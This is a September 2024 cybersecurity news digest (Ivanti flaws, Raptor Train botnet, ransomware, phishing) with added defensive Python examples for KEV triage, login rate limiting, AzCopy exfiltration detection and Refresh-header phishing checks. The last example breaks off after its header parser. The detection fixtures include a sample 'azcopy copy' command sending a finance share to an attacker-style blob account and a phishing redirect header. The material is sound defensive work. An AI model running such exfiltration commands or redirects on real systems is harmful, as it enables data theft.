        • CVE-2024-8963 Ivanti Cloud Services Appliance (CSA) Path Traversal Vulnerability

        These types of vulnerabilities are frequent attack vectors for malicious cyber actors and pose significant risks to the federal enterprise.

        Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities established the Known Exploited Vulnerabilities Catalog as a living list of known Common Vulnerabilities and Exposures (CVEs) that carry significant risk to the federal enterprise. BOD 22-01 requires Federal Civilian Executive Branch (FCEB) agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the BOD 22-01 Fact Sheet for more information.

        Although BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of Catalog vulnerabilities as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the catalog that meet the specified criteria "
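The workflow the alert asks for (check what you run against the catalog, then act before the due date) in code, as an added example that is not CISA tooling. The catalog excerpt is constructed in the layout of the public KEV JSON feed (field names such as `cveID`, `vulnerabilityName` and `dueDate` follow that feed; the two due dates are the ones quoted in the Ivanti CSA and Windows MSHTML items of this digest), and the hostnames, scanner findings and the placeholder ID `CVE-2024-0000` are assumptions made for the example.

```python
"""Triage scanner findings against a KEV-style catalog and surface BOD 22-01 due dates.

Added example, not CISA tooling. Field names follow the public KEV JSON feed; the catalog
excerpt, hosts and findings below are constructed for illustration.
"""
import json
from datetime import date

# Constructed catalog excerpt in the public feed's layout.
SAMPLE_KEV_JSON = """
{
  "title": "sample catalog excerpt",
  "vulnerabilities": [
    {"cveID": "CVE-2024-8963", "vendorProject": "Ivanti", "product": "Cloud Services Appliance",
     "vulnerabilityName": "Ivanti Cloud Services Appliance (CSA) Path Traversal Vulnerability",
     "dateAdded": "2024-09-19", "dueDate": "2024-10-10"},
    {"cveID": "CVE-2024-43461", "vendorProject": "Microsoft", "product": "Windows",
     "vulnerabilityName": "Microsoft Windows MSHTML Platform Spoofing Vulnerability",
     "dateAdded": "2024-09-16", "dueDate": "2024-10-07"}
  ]
}
"""

# Constructed scanner output as (hostname, CVE ID). CVE-2024-0000 is a placeholder
# (not a valid ID) standing in for a finding that is not in the catalog.
SAMPLE_FINDINGS = [
    ("csa-edge01", "CVE-2024-8963"),
    ("ws-0417", "CVE-2024-43461"),
    ("ws-0417", "CVE-2024-0000"),
]


def load_kev(kev_json: str) -> dict:
    """Index catalog entries by CVE ID for direct lookup."""
    return {v["cveID"]: v for v in json.loads(kev_json)["vulnerabilities"]}


def triage(kev_json: str, findings: list, today: str) -> list:
    """Return the findings that appear in the catalog, most urgent first.

    `today` is an ISO date. Each hit carries the catalog due date, the days remaining
    (negative once overdue) and an overdue flag. Findings absent from the catalog are
    skipped here and left to ordinary CVSS-based prioritisation.
    """
    kev = load_kev(kev_json)
    today_d = date.fromisoformat(today)
    hits = []
    for host, cve in findings:
        entry = kev.get(cve)
        if entry is None:
            continue
        due = date.fromisoformat(entry["dueDate"])
        hits.append({
            "host": host,
            "cve": cve,
            "name": entry["vulnerabilityName"],
            "due": entry["dueDate"],
            "days_left": (due - today_d).days,
            "overdue": due < today_d,
        })
    hits.sort(key=lambda h: (h["due"], h["host"]))  # ISO dates sort chronologically as strings
    return hits


if __name__ == "__main__":
    for h in triage(SAMPLE_KEV_JSON, SAMPLE_FINDINGS, "2024-10-08"):
        state = "OVERDUE" if h["overdue"] else f"{h['days_left']} days left"
        print(f"{h['host']:<12} {h['cve']:<16} due {h['due']} ({state})  {h['name']}")
```

Run against a real export of the feed, the same function gives a per-host list ordered by CISA's due date, which is the order the directive expects remediation to follow; anything not in the catalog still needs normal prioritisation, it just is not exploited-in-the-wild as far as CISA knows.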

        Autosummary: "


Wherever There's Ransomware, There's Service Account Compromise. Are You Protected?

        exploits ransomware
        2024-09-19 https://thehackernews.com/2024/09/wherever-theres-ransomware-theres.html
Until just a couple of years ago, only a handful of IAM pros knew what service accounts are. In recent years, these silent Non-Human Identity (NHI) accounts have become one of the most targeted and compromised attack surfaces. Assessments report that compromised service accounts play a key role in lateral movement in over 70% of ransomware attacks. However, there’s an alarming disproportion "

Autosummary: In this article, we explore what makes service accounts such a lucrative target, why they are beyond the scope of most security controls, and how the new approach of unified identity security can prevent service accounts from compromise and abuse. Silverfort's service account protection: automated discovery, profiling, and protection. Silverfort enables identity and security teams to keep their service accounts secure in the following manner. Automated discovery: Silverfort sees and analyzes every AD authentication. Silverfort's identity security platform is built on a proprietary technology that enables it to have continuous visibility, risk analysis, and active enforcement on any AD authentication, including, of course, the ones made by service accounts. "


        Ivanti warns of a new actively exploited Cloud Services Appliance (CSA) flaw

        exploits
        2024-09-19 https://securityaffairs.com/168617/security/ivanti-cloud-services-appliance-cve-2024-8963.html
        Ivanti warned of a new Cloud Services Appliance (CSA) vulnerability that is being exploited in attacks in the wild against a limited number of customers. Ivanti warned of a new Cloud Services Appliance (CSA) vulnerability, tracked as CVE-2024-8963 (CVSS score of 9.4), actively exploited in attacks in the wild against a limited number of customers. […] "

Autosummary: Pierluigi Paganini, September 19, 2024. Ivanti warned of a new Cloud Services Appliance (CSA) vulnerability that is being exploited in attacks in the wild against a limited number of customers. "


        CISA warns of actively exploited Apache HugeGraph-Server bug

        exploits
        2024-09-19 https://www.bleepingcomputer.com/news/security/cisa-warns-of-actively-exploited-apache-hugegraph-server-bug/
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added five flaws to its Known Exploited Vulnerabilities (KEV) catalog, among which is a remote code execution (RCE) flaw impacting Apache HugeGraph-Server. [...] "

        Autosummary: Apache HugeGraph-Server is the core component of the Apache HugeGraph project, an open-source graph database designed for handling large-scale graph data with high performance and scalability, supporting complex operations required in deep relationship exploitation, data clustering, and path searches. "


        Influencing the influencers | Unlocked 403 cybersecurity podcast (ep. 6)

        ciber
        2024-09-19 https://www.welivesecurity.com/en/videos/influencing-influencers-unlocked-403-cybersecurity-podcast-ep-6/
How do analyst relations professionals "sort through the noise" and help deliver the not-so-secret sauce for a company's success? We spoke with ESET's expert to find out. "

        Autosummary: "


        Cybersecurity jobs available right now: September 18, 2024

        ciber
        2024-09-18 https://www.helpnetsecurity.com/2024/09/18/cybersecurity-jobs-available-right-now-september-18-2024/

Application Security Engineer | CHANEL | France | On-site. As an Application Security Engineer, you will perform application-focused offensive security assessments of existing and upcoming Chanel features and products; enforce CI/CD security tooling (SAST, dependency checkers, IAST, RASP); identify vulnerabilities in the source code and design of products; fix vulnerabilities or support development teams in fixing them; maintain and contribute to Chanel’s Secure Development Lifecycle; and contribute to the Red Team / … More

        The post Cybersecurity jobs available right now: September 18, 2024 appeared first on Help Net Security.

        "

Autosummary:
Senior Red Team Operator | Deloitte | Australia | On-site. As a Senior Red Team Operator, you will deliver red team campaigns by performing intelligence gathering on target networks, people, processes, and technologies, finding creative ways to gain a foothold in target networks, delivering malware and establishing command and control (C2), and moving stealthily within target networks to achieve campaign objectives while remaining undetected by blue teams.
Senior Engineer – Application Security | Trust in SODA | Ireland | Remote. As a Senior Engineer – Application Security, you will design, develop, test, deploy and maintain SAST, SCA and secret scanning tools in the CI/CD pipeline and developer workflow tools.
Senior Security Engineer | Avrioc Technologies | UAE | On-site. As a Senior Security Engineer, you will design, implement, and manage SIEM, PAM, and DAM solutions to secure access to critical systems and sensitive data.
Network and Security Engineer | SiPearl | France | Hybrid. As a Network and Security Engineer, you will manage the company’s networks (2 data centers in France, offices in France, Germany, Spain, and remote offices).
Malware Reverse Engineer | IBM | Philippines | On-site. As a Malware Reverse Engineer, you will completely reverse engineer malicious software, write detailed reports on command functionality, malware communications, and encryption mechanisms, and develop targeted Python scripts to support identification and automation efforts.
Senior Manual Ethical Hacker | Bank of America | United Kingdom | On-site. As a Senior Manual Ethical Hacker, you will assess the company’s application security by conducting penetration tests, evaluating both internal and external web, mobile, and web service applications. "


        Critical VMware vCenter Server bugs fixed (CVE-2024-38812)

        exploits
        2024-09-18 https://www.helpnetsecurity.com/2024/09/18/cve-2024-38812-cve-2024-38813/

        Broadcom has released fixes for two vulnerabilities affecting VMware vCenter Server that can be triggered by sending a specially crafted network packet, and could lead to remote code execution (CVE-2024-38812) or privilege escalation (CVE-2024-38813). “Broadcom is not currently aware of exploitation ‘in the wild’,” the company says, but noted that organizations should promptly act to install one of the updated versions. VMware has patched a similarly critical RCE flaw (CVE-2023-34048) in vCenter Server in October … More

        The post Critical VMware vCenter Server bugs fixed (CVE-2024-38812) appeared first on Help Net Security.

        "

        Autosummary: "


        Rapid7 launches Vector Command for continuous red teaming and security gap identification

        ransomware
        2024-09-18 https://www.helpnetsecurity.com/2024/09/18/rapid7-vector-command/

        Rapid7 has unveiled Vector Command, a fully-managed offensive security service. Vector Command combines the external attack surface assessment capabilities of Rapid7’s recently launched Command Platform with continuous Red Teaming services by its internal experts to help customers identify and validate IT security posture weaknesses from an attacker’s perspective. As the attack surface expands through shadow IT, cloud resources, SaaS solutions, and more, security leaders must maintain visibility of their organization’s internet-facing assets and the security … More

        The post Rapid7 launches Vector Command for continuous red teaming and security gap identification appeared first on Help Net Security.

        "

        Autosummary: "


        North Korean Hackers Target Energy and Aerospace Industries with New MISTPEN Malware

        exploits industry
        2024-09-18 https://thehackernews.com/2024/09/north-korean-hackers-target-energy-and.html
        A North Korea-linked cyber-espionage group has been observed leveraging job-themed phishing lures to target prospective victims in energy and aerospace verticals and infect them with a previously undocumented backdoor dubbed MISTPEN. The activity cluster is being tracked by Google-owned Mandiant under the moniker UNC2970, which it said overlaps with a threat group known as TEMP.Hermit, which is "

        Autosummary: The threat intelligence firm said it has observed UNC2970 singling out various entities located in the U.S., the U.K., the Netherlands, Cyprus, Sweden, Germany, Singapore, Hong Kong, and Australia. "


        Chinese botnet infects 260,000 SOHO routers, IP cameras with malware

        exploits
        2024-09-18 https://www.bleepingcomputer.com/news/security/flax-typhoon-hackers-infect-260-000-routers-ip-cameras-with-botnet-malware/
        The FBI and cybersecurity researchers have disrupted a massive Chinese botnet called "Raptor Train" that infected over 260,000 networking devices to target critical infrastructure in the US and in other countries. [...] "

        Autosummary: "Ultimately as part of this operation we were able to identify thousands of infected devices, and then with court authorization, issued commands to remove malware from them, prying them from China"s grip" - Christopher Wray In a MySQL database retrieved from an upstream management server (Tier 3), the FBI found that in June this year, there were more than 1.2 million records of compromised devices (active and previously compromised), with 385,000 unique systems in the U.S. Over four years, Raptor Train has grown into a complex, multi-tiered network with an enterprise-grade control system for handling tens of servers and a large number of infected SOHO and consumer devices: routers and modems, NVRs and DVRs, IP cameras, and network-attached storage (NAS) servers. The botnet has been used to target entities in the military, government, higher education, telecommunications, defense industrial base (DIB), and IT sectors, mainly in the US and Taiwan. "


        Russian security firm Dr.Web disconnects all servers after breach

        rusia-ucrania
        2024-09-18 https://www.bleepingcomputer.com/news/security/russian-security-firm-drweb-disconnects-all-servers-after-breach/
        On Tuesday, Russian anti-malware company Doctor Web (Dr.Web) disclosed a security breach after its systems were targeted in a cyberattack over the weekend. [...] "

        Autosummary: "The attempt to harm our infrastructure was prevented in a timely manner, and no user whose system was protected by Dr.Web was affected," it added in a separate statement in English, published on its official website. "


        Walmart customers scammed via fake shopping lists, threatened with arrest

        financial
        2024-09-18 https://www.malwarebytes.com/blog/scams/2024/09/walmart-customers-scammed-via-fake-shopping-lists-threatened-with-arrest
        Scammers are creating fake Walmart virtual shopping lists that look like a contact page for customer service. "

Autosummary: The call centre uses several different people, who each play a different role in processing victims:
• the Walmart customer service representative
• the higher authority or “supervisor”
• a fake bank employee
• a fake FTC investigator
When we called, the scammers claimed that our account had been used to transfer huge amounts of money to narco trafficking countries: “Now, all the banking found which was created using your personal information are transferring huge amounts of money to the narco trafficking countries such as Colombia, Mexico, some Saudi Arabia countries and Colombia.” Oddly enough, the scammer mentions there won’t be any taxes on the transaction, which really would be the last concern of someone who’s about to be arrested: “Yes, I know Sir, it’s not a checking account, it’s a Bitcoin wallet.” Figure 1: A Google search for Walmart’s phone number on a mobile device. Figure 2: A Google search for Walmart’s phone number on a desktop computer. Walmart Lists: In previous cases, we have seen malicious advertisers impersonate brands by displaying their official website in the ad URL. "


        New "Raptor Train" IoT Botnet Compromises Over 200,000 Devices Worldwide

        industry
        2024-09-18 https://thehackernews.com/2024/09/new-raptor-train-iot-botnet-compromises.html
Cybersecurity researchers have uncovered a never-before-seen botnet comprising an army of small office/home office (SOHO) and IoT devices that are likely operated by a Chinese nation-state threat actor called Flax Typhoon (aka Ethereal Panda or RedJuliett). The sophisticated botnet, dubbed Raptor Train by Lumen's Black Lotus Labs, is believed to have been operational since at least May 2020, "

        Autosummary: Some of the devices targeted include routers, IP cameras, DVRs, and NAS from various manufacturers such as ActionTec, ASUS, DrayTek, Fujitsu, Hikvision, Mikrotik, Mobotix, Panasonic, QNAP, Ruckus Wireless, Shenzhen TVT, Synology, Tenda, TOTOLINK, TP-LINK, and Zyxel. "


        Microsoft: Vanilla Tempest hackers hit healthcare with INC ransomware

        exploits ransomware
        2024-09-18 https://www.bleepingcomputer.com/news/microsoft/microsoft-vanilla-tempest-hackers-hit-healthcare-with-inc-ransomware/
        ​Microsoft says a ransomware affiliate it tracks as Vanilla Tempest now targets U.S. healthcare organizations in INC ransomware attacks. [...] "

        Autosummary: "


        Experts warn of China-linked APT’s Raptor Train IoT Botnet

        industry
        2024-09-18 https://securityaffairs.com/168563/malware/raptor-train-botnet-iot.html
Researchers warn of a new IoT botnet called Raptor Train that has already compromised over 200,000 devices worldwide. Cybersecurity researchers from Lumen’s Black Lotus Labs discovered a new botnet, named Raptor Train, composed of small office/home office (SOHO) and IoT devices. The experts believe the botnet is controlled by the China-linked APT group Flax Typhoon (also […] "

Autosummary: Below are some of the devices included in the botnet:
Modems/Routers: ActionTec PK5000, ASUS RT-*/GT-*/ZenWifi, TP-LINK, DrayTek Vigor, Tenda Wireless, Ruijie, Zyxel USG*, Ruckus Wireless, VNPT iGate, Mikrotik, TOTOLINK
IP Cameras: D-LINK DCS-*, Hikvision, Mobotix, NUUO, AXIS, Panasonic
NVR/DVR: Shenzhen TVT NVRs/DVRs
NAS: QNAP (TS Series), Fujitsu, Synology
The attribution of the Raptor Train botnet to the Chinese nation-state actor is based on multiple factors, including the operational timelines, targeting of sectors aligned with Chinese interests, use of the Chinese language, and other tactics, techniques, and procedures (TTPs) that overlap with known Chinese cyber activities. "


        X working again in Brazil as Elon Musk finds way around ban

        latam
        2024-09-18 https://www.bbc.com/news/articles/cy4dn4z02emo
        The social media platform X, formerly Twitter, was banned in the country on 31 August. "

        Autosummary: "Unlike the previous system, which used specific, blockable IPs, the new system uses dynamic IPs that change constantly," the news release states. "


        The cybersecurity workforce of the future requires diverse hiring practices

        ciber
        2024-09-17 https://www.helpnetsecurity.com/2024/09/17/cybersecurity-workplace-skills-shortage/

        The global cybersecurity workforce gap reached a new high with an estimated 4.8 million professionals needed to effectively secure organizations, a 19% year-on-year increase, according to ISC2. Despite the growing need for professionals, global workforce growth has slowed for the first time since ISC2 began estimating the workforce size six years ago, holding at an estimated 5.5 million people (a 0.1% year-on-year increase). This contrasts with last year, when the workforce grew 8.7% year-on-year despite … More

        The post The cybersecurity workforce of the future requires diverse hiring practices appeared first on Help Net Security.

        "

Autosummary: While 74% of professionals agree that the 2024 threat landscape is the most challenging it has been in the last five years, budget pressures on the cybersecurity workforce include:
• 37% experiencing budget cuts (+7% from 2023)
• 25% experiencing layoffs in their cybersecurity team (+3% from 2023)
• 38% experiencing hiring freezes (+6% from 2023)
• 32% seeing fewer promotions (+6% from 2023)
Skills gaps put organizations at risk. This year, a record 15,852 cybersecurity practitioners and decision-makers participated in the study. "


        Russian state media networks banned by Facebook owner

        government rusia-ucrania
        2024-09-17 https://www.bbc.com/news/articles/c4gllnx0p40o
        Russian state media outlets have come under increased scrutiny in Western countries. "

        Autosummary: Russian state media networks banned by Facebook owner The Russian embassy in Washington, broadcaster RT, formerly Russia Today, and the owner of the Sputnik news agency, Rossiya Segodnya, did not immediately respond to BBC requests for comment. "


        Binance Warns of Rising Clipper Malware Attacks Targeting Cryptocurrency Users

        exploits
        2024-09-17 https://thehackernews.com/2024/09/binance-warns-of-rising-clipper-malware.html
Cryptocurrency exchange Binance is warning of an "ongoing" global threat that's targeting cryptocurrency users with clipper malware with the goal of facilitating financial fraud. Clipper malware, also called ClipBankers, is a type of malware that Microsoft calls cryware, which comes with capabilities to monitor a victim's clipboard activity and steal sensitive data a user copies, including "

        Autosummary: "


        SolarWinds Issues Patch for Critical ARM Vulnerability Enabling RCE Attacks

        exploits
        2024-09-17 https://thehackernews.com/2024/09/solarwinds-issues-patch-for-critical.html
        SolarWinds has released fixes to address two security flaws in its Access Rights Manager (ARM) software, including a critical vulnerability that could result in remote code execution. The vulnerability, tracked as CVE-2024-28991, is rated 9.0 out of a maximum of 10.0 on the CVSS scoring system. It has been described as an instance of deserialization of untrusted data. "SolarWinds Access Rights "

        Autosummary: "


        Qilin ransomware attack on Synnovis impacted over 900,000 patients

        exploits ransomware
        2024-09-17 https://securityaffairs.com/168480/data-breach/qilin-attack-on-synnovis-impacted-900000-patients.html
The personal information of almost a million individuals was published online following a ransomware attack that in June disrupted NHS hospitals in London. In June, a ransomware attack on pathology and diagnostic services provider Synnovis severely impacted the operations at several major NHS hospitals in London. The attack forced the impacted hospitals to cancel some […] "

        Autosummary: “People with symptoms of sensitive medical conditions, including cancer and sexually transmitted infections, are among almost a million individuals who had their personal information published online following a ransomware attack that disrupted NHS hospitals in London earlier this year, according to an analysis shared with Recorded Future News.” reported Recorded Future News. "


        PoC exploit for exploited Ivanti Cloud Services Appliance flaw released (CVE-2024-8190)

        exploits
        2024-09-17 https://www.helpnetsecurity.com/2024/09/17/cve-2024-8190/

        CVE-2024-8190, an OS command injection vulnerability in Ivanti Cloud Services Appliance (CSA) v4.6, is under active exploitation. Details about the attacks are still unknown, but there may be more in the near future: Horizon3.ai researchers have published their analysis of the flaw and a PoC exploit for it. About CVE-2024-8190 CVE-2024-8190 is a command injection vulnerability that can only be exploited if the attacker manages to log into the appliance’s admin login page first. According … More

        The post PoC exploit for exploited Ivanti Cloud Services Appliance flaw released (CVE-2024-8190) appeared first on Help Net Security.

        "

        Autosummary: And while users are required to change the default login credentials (username: admin, password: admin) when logging in for the first time, a new password might not be strong enough to counter the disadvantage presented by non-existent rate limiting for login attempts. "
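The two weaknesses the summary calls out (a shipped default credential and unlimited login attempts) are cheap to close at the login handler. The gate below is an added example of those controls and is not Ivanti code; the thresholds, the choice of the remote address as the rate-limit key, the PBKDF2 parameters and the default-credential list are assumptions made for the example.

```python
"""Admin login gate with per-source rate limiting, lockout and default-credential rejection.

Added example of the controls the appliance is described as lacking; not Ivanti code.
Thresholds, the rate-limit key and the default-credential list are assumptions.
"""
import hashlib
import hmac
import os
from collections import defaultdict, deque

MAX_FAILURES = 5          # failures allowed per source inside the window before lockout
WINDOW_SECONDS = 300      # sliding window over which failures are counted
LOCKOUT_SECONDS = 900     # how long a source stays locked once the limit is hit
DEFAULT_CREDENTIALS = {("admin", "admin")}   # shipped defaults that must never authenticate
_DUMMY_SALT = b"\0" * 16                     # so unknown users cost the same as known ones


def _derive(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2-HMAC-SHA256; iteration count is an assumption for the example."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


class LoginGate:
    def __init__(self) -> None:
        self._users = {}                        # user -> (salt, derived key)
        self._failures = defaultdict(deque)     # source -> timestamps of recent failures
        self._locked_until = {}                 # source -> unix time the lock expires

    def set_password(self, user: str, password: str) -> None:
        """Store a salted hash; refuse to (re)install a shipped default credential."""
        if (user, password) in DEFAULT_CREDENTIALS:
            raise ValueError("refusing to set a known default credential")
        salt = os.urandom(16)
        self._users[user] = (salt, _derive(password, salt))

    def attempt(self, source: str, user: str, password: str, now: float) -> str:
        """Evaluate one login attempt; returns 'ok', 'denied' or 'locked'.

        `source` is the client key to rate-limit on (e.g. the remote IP); `now` is a unix
        time supplied by the caller so the logic is testable without sleeping.
        """
        if self._locked_until.get(source, 0.0) > now:
            return "locked"
        window = self._failures[source]
        while window and window[0] <= now - WINDOW_SECONDS:
            window.popleft()                     # forget failures outside the window

        salt, stored = self._users.get(user, (_DUMMY_SALT, b"\0" * 32))
        # compare_digest keeps the check constant-time; the membership test stops the
        # dummy entry from ever authenticating
        if hmac.compare_digest(_derive(password, salt), stored) and user in self._users:
            window.clear()
            return "ok"

        window.append(now)
        if len(window) >= MAX_FAILURES:
            self._locked_until[source] = now + LOCKOUT_SECONDS
            return "locked"
        return "denied"
```

Unknown usernames go through the same key derivation as real ones, so response time does not leak which accounts exist; the lock is per source, so one attacker hammering the page does not lock out an administrator connecting from elsewhere, while a distributed brute force is still bounded by `MAX_FAILURES` per address per window.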


        U.S. CISA adds Microsoft Windows MSHTML Platform and Progress WhatsUp Gold bugs to its Known Exploited Vulnerabilities catalog

        exploits
        2024-09-17 https://securityaffairs.com/168505/security/u-s-cisa-microsoft-windows-mshtml-platform-progress-whatsup-gold-bugs-known-exploited-vulnerabilities-catalog.html
U.S. Cybersecurity and Infrastructure Security Agency (CISA) adds Microsoft Windows MSHTML Platform and Progress WhatsUp Gold bugs to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added Microsoft Windows MSHTML Platform and Progress WhatsUp Gold vulnerabilities to its Known Exploited Vulnerabilities (KEV) catalog. Below are the descriptions for these vulnerabilities: CVE-2024-43461 – Microsoft this week […] "

Autosummary:
• CVE-2024-43461 Microsoft Windows MSHTML Platform Spoofing Vulnerability
• CVE-2024-6670 Progress WhatsUp Gold SQL Injection Vulnerability
CVE-2024-43461 – Microsoft this week warned that attackers actively exploited the Windows vulnerability CVE-2024-43461 as a zero-day before July 2024. According to Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities, FCEB agencies have to address the identified vulnerabilities by the due date to protect their networks against attacks exploiting the flaws in the catalog. "


        Ransomware gangs now abuse Microsoft Azure tool for data theft

        exploits
        2024-09-17 https://www.bleepingcomputer.com/news/security/ransomware-gangs-now-abuse-microsoft-azure-tool-for-data-theft/
Ransomware gangs like BianLian and Rhysida increasingly use Microsoft's Azure Storage Explorer and AzCopy to steal data from breached networks and store it in Azure Blob storage. [...] "

Autosummary: Successful data transfer log (Source: modePUSH). Defense measures include monitoring for AzCopy execution, outbound network traffic to Azure Blob Storage endpoints at ".blob.core.windows.net" or Azure IP ranges, and setting alarms for unusual patterns in file copying or access on critical servers. "
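The three defence measures listed (AzCopy execution, traffic to `.blob.core.windows.net`, unusual volume from critical servers) expressed as detection rules over endpoint telemetry, as an added example; this is not modePUSH or Microsoft code. The JSON-lines event layout, the hostnames, the allowlist of sanctioned storage accounts and the 1 GiB threshold are assumptions, and the events are constructed.

```python
"""Flag AzCopy / Storage Explorer use and unsanctioned Azure Blob endpoints in telemetry.

Added example built on the defence measures the article lists; not modePUSH or Microsoft
code. Event layout, hostnames, allowlist and threshold are assumptions; events are constructed.
"""
import json
import re
from typing import Optional

SANCTIONED_ACCOUNTS = {"corpartifacts"}              # storage accounts the org legitimately uses
LARGE_UPLOAD_BYTES = 1 << 30                          # 1 GiB outbound to a single endpoint
TOOL_IMAGES = {"azcopy.exe", "storageexplorer.exe"}   # the two tools the article names
# Azure storage account labels are 3-24 lowercase alphanumerics in front of the blob suffix
BLOB_HOST_RE = re.compile(r"^([a-z0-9]{3,24})\.blob\.core\.windows\.net$", re.I)

# Constructed telemetry: process-creation and network events, one JSON object per line.
SAMPLE_EVENTS = r"""
{"ts": "2024-09-17T02:14:09Z", "host": "FS01", "type": "process", "image": "C:\\Tools\\azcopy.exe", "cmdline": "azcopy.exe copy D:\\Shares\\Finance https://exfil7.blob.core.windows.net/bk --recursive"}
{"ts": "2024-09-17T02:14:11Z", "host": "FS01", "type": "network", "dest_host": "exfil7.blob.core.windows.net", "dest_port": 443, "bytes_out": 5838213123}
{"ts": "2024-09-17T02:20:40Z", "host": "BUILD02", "type": "network", "dest_host": "corpartifacts.blob.core.windows.net", "dest_port": 443, "bytes_out": 1048576}
{"ts": "2024-09-17T02:21:05Z", "host": "WS-17", "type": "process", "image": "C:\\Windows\\System32\\notepad.exe", "cmdline": "notepad.exe"}
"""


def blob_account(hostname: Optional[str]) -> Optional[str]:
    """Return the storage-account label of an Azure Blob hostname, or None if it is not one."""
    m = BLOB_HOST_RE.match(hostname or "")
    return m.group(1).lower() if m else None


def detect(jsonl: str) -> list:
    """Run the three rules over JSON-lines telemetry; alerts come back in event order."""
    alerts = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        host = ev["host"]
        if ev["type"] == "process":
            # normalise path separators, then compare the basename case-insensitively
            image = ev["image"].replace("\\", "/").rsplit("/", 1)[-1].lower()
            if image in TOOL_IMAGES:
                alerts.append({"rule": "azcopy_execution", "host": host, "detail": ev["cmdline"]})
        elif ev["type"] == "network":
            account = blob_account(ev.get("dest_host"))
            if account is None:
                continue
            if account not in SANCTIONED_ACCOUNTS:
                alerts.append({"rule": "unsanctioned_blob_endpoint", "host": host,
                               "detail": ev["dest_host"]})
            if ev.get("bytes_out", 0) >= LARGE_UPLOAD_BYTES:
                alerts.append({"rule": "large_blob_upload", "host": host,
                               "detail": f"{ev['bytes_out']} bytes to {ev['dest_host']}"})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"{a['rule']:<28} {a['host']:<8} {a['detail']}")
```

The allowlist is what keeps this usable: blob traffic is normal in most estates, so the signal is a storage account nobody sanctioned, or a sanctioned one receiving far more than it should from a server that has no business uploading.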


        Chinese man charged for spear-phishing against NASA and US Government

        financial government
        2024-09-17 https://securityaffairs.com/168514/cyber-crime/chinese-man-spear-phishing-nasa-us-government.html
US DoJ charged a Chinese national who used spear-phishing emails to obtain sensitive info from NASA, the U.S. Air Force, Navy, Army, and the FAA. The U.S. DoJ charged a Chinese national, Song Wu (39), who used spear-phishing emails to target employees of NASA, the U.S. Air Force, Navy, Army, and the FAA. The man, […] "

Autosummary: Pierluigi Paganini, September 17, 2024. US DoJ charged a Chinese national who used spear-phishing emails to obtain sensitive info from NASA, the U.S. Air Force, Navy, Army, and the FAA. "


        Broadcom fixes critical RCE bug in VMware vCenter Server

        exploits
        2024-09-17 https://www.bleepingcomputer.com/news/security/broadcom-fixes-critical-rce-bug-in-vmware-vcenter-server/
        Broadcom has fixed a critical VMware vCenter Server vulnerability that attackers can exploit to gain remote code execution on unpatched servers via a network packet. [...] "

        Autosummary: "


        AT&T pays $13 million FCC settlement over 2023 data breach

        financial
        2024-09-17 https://www.bleepingcomputer.com/news/security/atandt-pays-13-million-fcc-settlement-over-2023-data-breach/
        The Federal Communications Commission (FCC) has reached a $13 million settlement with AT&T to resolve a probe into whether the telecom giant failed to protect customer data after a vendor"s cloud environment was breached three years ago. [...] "

Autosummary: The consent decree mandates AT&T to implement a comprehensive Information Security Program that includes broad customer data protection, improve its data inventory processes to track data shared with vendors, ensure that vendors follow retention and disposal rules for customer information (to limit the amount of customer data vulnerable to data breaches), and conduct annual compliance audits to assess AT&T's compliance with these requirements. "


        Cybercriminals Exploit HTTP Headers for Credential Theft via Large-Scale Phishing Attacks

        financial exploits ciber
        2024-09-16 https://thehackernews.com/2024/09/cybercriminals-exploit-http-headers-for.html
Cybersecurity researchers have warned of ongoing phishing campaigns that abuse refresh entries in HTTP headers to deliver spoofed email login pages that are designed to harvest users' credentials. "Unlike other phishing webpage distribution behavior through HTML content, these attacks use the response header sent by a server, which occurs before the processing of the HTML content," Palo Alto "

        Autosummary: Dubbed Greasy Opal by Arkose Labs, the Czech Republic-based "cyber attack enablement business" is believed to have been operational since 2009, offering to customers a toolkit of sorts for credential stuffing, mass fake account creation, browser automation, and social media spam at a price point of $190 and an additional $10 for a monthly subscription. Over 36% of the attacks have singled out the business-and-economy sector, followed by financial services (12.9%), government (6.9%), health and medicine (5.7%), and computer and internet (5.4%). "
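Because the redirect lives in the response header rather than the HTML, a scanner that only inspects the body never sees it. The inspector below is an added example of checking the header itself; it is not Unit 42's detection logic. The sample responses are constructed, and the heuristic (target on another host, zero delay, a recipient address carried in the URL) is an assumption drawn from the behaviour the item describes.

```python
"""Inspect an HTTP response for a Refresh header that bounces the client to a phishing page.

Added example, not Unit 42's logic. Sample responses are constructed; the scoring heuristic
(off-origin target, zero delay, recipient address embedded in the URL) is an assumption.
"""
import re
from typing import Optional
from urllib.parse import unquote, urlsplit

# "Refresh: <seconds>; url=<target>", optionally quoted
REFRESH_RE = re.compile(r"^\s*(\d+)\s*;\s*url\s*=\s*['\"]?([^'\"\s]+)", re.I)
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}")

# Constructed responses. The first mimics the abuse: an innocuous 200 whose header sends the
# browser straight to another host, with the target's address in the fragment so the fake
# login page can pre-fill it. The hostnames are documentation-style placeholders.
MALICIOUS = (b"HTTP/1.1 200 OK\r\nServer: nginx\r\n"
             b"Refresh: 0; url=https://login-verify.example.net/owa/?#jdoe@victimcorp.example\r\n"
             b"Content-Type: text/html\r\n\r\n<html><body>Loading</body></html>")
BENIGN = b"HTTP/1.1 200 OK\r\nRefresh: 5; url=/status\r\nContent-Type: text/html\r\n\r\n<p>busy</p>"
PLAIN = b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<p>hello</p>"


def parse_headers(raw: bytes) -> dict:
    """Parse the header block of a raw response (status line skipped, body ignored)."""
    head, _, _ = raw.partition(b"\r\n\r\n")
    headers = {}
    for line in head.decode("latin-1").split("\r\n")[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers


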